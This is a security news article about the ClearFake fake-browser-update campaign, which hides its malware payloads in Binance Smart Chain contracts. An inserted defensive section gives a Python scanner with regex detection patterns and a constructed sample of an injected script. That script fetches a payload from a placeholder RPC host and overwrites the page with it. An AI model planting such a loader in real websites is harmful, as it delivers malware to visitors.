The Fake Browser Update Scam Gets a Makeover – Krebs on Security

By admin

One of the oldest malware tricks in the book — hacked websites claiming visitors need to update their Web browser before they can view any content — has roared back to life in the past few months. New research shows the attackers behind one such scheme have developed an ingenious way of keeping their malware from being taken down by security experts or law enforcement: By hosting the malicious files on a decentralized, anonymous cryptocurrency blockchain.

In August 2023, security researcher Randy McEoin blogged about a scam he dubbed ClearFake, which uses hacked WordPress sites to serve visitors with a page that claims you need to update your browser before you can view the content.

The fake browser alerts are specific to the browser you’re using, so if you’re surfing the Web with Chrome, for example, you’ll get a Chrome update prompt. Those who are fooled into clicking the update button will have a malicious file dropped on their system that tries to install an information stealing trojan.


Earlier this month, researchers at the Tel Aviv-based security firm Guardio said they tracked an updated version of the ClearFake scam that included an important evolution. Previously, the group had stored its malicious update files on Cloudflare, Guardio said.

But when Cloudflare blocked those accounts the attackers began storing their malicious files as cryptocurrency transactions in the Binance Smart Chain (BSC), a technology designed to run decentralized apps and “smart contracts,” or coded agreements that execute actions automatically when certain conditions are met.


Nati Tal, head of security at Guardio Labs, the research unit at Guardio, said the malicious scripts stitched into hacked WordPress sites will create a new smart contract on the BSC Blockchain, starting with a unique, attacker-controlled blockchain address and a set of instructions that defines the contract’s functions and structure. When that contract is queried by a compromised website, it will return an obfuscated and malicious payload.

“These contracts offer innovative ways to build applications and processes,” Tal wrote along with his Guardio colleague Oleg Zaytsev. “Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted ‘on-chain’ without the ability for a takedown.”


Tal said hosting malicious files on the Binance Smart Chain is ideal for attackers because retrieving the malicious contract is a cost-free operation that was originally designed for the purpose of debugging contract execution issues without any real-world impact.

“So you get a free, untracked, and robust way to get your data (the malicious payload) without leaving traces,” Tal said.

In response to questions from KrebsOnSecurity, the BNB Smart Chain (BSC) said its team is aware of the malware abusing its blockchain, and is actively addressing the issue. The company said all addresses associated with the spread of the malware have been blacklisted, and that its technicians had developed a model to detect future smart contracts that use similar methods to host malicious scripts.

“This model is designed to proactively identify and mitigate potential threats before they can cause harm,” BNB Smart Chain wrote. “The team is committed to ongoing monitoring of addresses that are involved in spreading malware scripts on the BSC. To enhance their efforts, the tech team is working on linking identified addresses that spread malicious scripts to centralized KYC [Know Your Customer] information, when possible.”


Guardio says the crooks behind the BSC malware scheme are using the same malicious code as the attackers that McEoin wrote about in August, and are likely the same group. But a report published today by email security firm Proofpoint says the company is currently tracking at least four distinct threat actor groups that use fake browser updates to distribute malware.

Proofpoint notes that the core group behind the fake browser update scheme has been using this technique to spread malware for the past five years, primarily because the approach still works well.

“Fake browser update lures are effective because threat actors are using an end-user’s security training against them,” Proofpoint’s Dusty Miller wrote. “In security awareness training, users are told to only accept updates or click on links from known and trusted sites, or individuals, and to verify sites are legitimate. The fake browser updates abuse this training because they compromise trusted sites and use JavaScript requests to quietly make checks in the background and overwrite the existing website with a browser update lure. To an end user, it still appears to be the same website they were intending to visit and is now asking them to update their browser.”
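The two traits described above, a read-only contract query from the compromised page (Tal's "cost-free" retrieval) and a background JavaScript rewrite of the existing site (Miller's description), give a site owner something concrete to look for. The following is an added illustration, not code from the article, Guardio or Proofpoint: a small Python heuristic that scans a page's inline scripts for that combination. The sample page, RPC host and contract address are constructed placeholders, and `eth_call` is assumed to be the EVM JSON-RPC read-only call that the "cost-free" query refers to.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: a normal theme script plus an injected inline script that
# makes a read-only JSON-RPC contract query (eth_call, assumed) and then replaces the
# whole document. The RPC host and contract address are placeholders, not real IoCs.
SAMPLE_HTML = """<html><body>
<script src="/wp-content/themes/example/theme.js"></script>
<script>
fetch("https://rpc.placeholder.invalid", {method: "POST",
  body: JSON.stringify({jsonrpc: "2.0", id: 1, method: "eth_call",
    params: [{to: "0x0000000000000000000000000000000000000000", data: "0x"}, "latest"]})})
  .then(r => r.json())
  .then(j => { document.documentElement.innerHTML = hexToText(j.result); });
</script>
</body></html>"""

class ScriptCollector(HTMLParser):
    """Collects the text of every <script> element in document order."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")   # external scripts keep an empty body
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

# Each heuristic alone is common in legitimate code; a read-only contract call
# combined with a whole-document rewrite is the pattern worth a manual review.
INDICATORS = {
    "eth_call": re.compile(r'"?method"?\s*:\s*"eth_call"'),
    "document_rewrite": re.compile(r"document\.(documentElement|body)\.innerHTML\s*=|document\.write\s*\("),
}

def scan_inline_scripts(html):
    """Return (script_index, sorted names of matched indicators) for every script."""
    collector = ScriptCollector()
    collector.feed(html)
    return [(i, sorted(n for n, rx in INDICATORS.items() if rx.search(body)))
            for i, body in enumerate(collector.scripts)]

def flag_suspicious(html, min_hits=2):
    """Indices of scripts that match at least min_hits indicators."""
    return [i for i, hits in scan_inline_scripts(html) if len(hits) >= min_hits]
```

Running this over a site's rendered pages (not just its theme files) matters, because the injected script may only be present in the served HTML.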


More than a decade ago, this site published Krebs’s Three Rules for Online Safety, of which Rule #1 was, “If you didn’t go looking for it, don’t install it.” It’s nice to know that this technology-agnostic approach to online safety remains just as relevant today.